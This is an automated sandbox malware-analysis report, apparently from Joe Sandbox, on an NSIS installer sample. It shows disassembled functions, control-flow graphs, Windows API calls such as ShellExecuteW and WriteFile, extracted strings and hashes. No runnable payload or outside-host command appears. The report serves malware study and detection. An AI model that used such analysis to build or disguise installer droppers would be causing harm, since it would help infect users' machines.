                                                                                                                                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                  • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                  • API String ID: 608394941-2746725676
                                                                                                                                                                                  • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                  • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                  Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,SeminarsRuralConductWagnerYahooWords,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,SeminarsRuralConductWagnerYahooWords,SeminarsRuralConductWagnerYahooWords,00000000,00000000,SeminarsRuralConductWagnerYahooWords,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427DC1,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                  • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$SeminarsRuralConductWagnerYahooWords
                                                                                                                                                                                  • API String ID: 4286501637-3003634926
                                                                                                                                                                                  • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                  • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                  • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                  Function 004035B3 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Null, xrefs: 004036AA
                                                                                                                                                                                  • Inst, xrefs: 00403698
                                                                                                                                                                                  • Error launching installer, xrefs: 00403603
                                                                                                                                                                                  • d.o, xrefs: 00403632
                                                                                                                                                                                  • soft, xrefs: 004036A1
                                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$d.o$soft
                                                                                                                                                                                  • API String ID: 4283519449-1846846767
                                                                                                                                                                                  • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                  • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                  Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                  • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00427DC1,00403792,00000000), ref: 004034FF
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                  • String ID: (]C$... %d%%$pAB
                                                                                                                                                                                  • API String ID: 651206458-3635341587
                                                                                                                                                                                  • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                  • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                  • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                  • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                  Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenW.KERNEL32(00445D80,00427DC1,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                  • lstrlenW.KERNEL32(004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                  • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                  • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427DC1,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2740478559-0
                                                                                                                                                                                  • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                  • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                  Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SeminarsRuralConductWagnerYahooWords, xrefs: 00402770
                                                                                                                                                                                  • <RM>, xrefs: 00402713
                                                                                                                                                                                  • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                  • String ID: <RM>$SeminarsRuralConductWagnerYahooWords$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                  • API String ID: 247603264-3698464886
                                                                                                                                                                                  • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                  • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                  Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427DC1,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                  • API String ID: 3156913733-2180253247
                                                                                                                                                                                  • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                  • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                  Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                                  • String ID: nsa
                                                                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                                                                  • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                  • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                  Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                  Strings
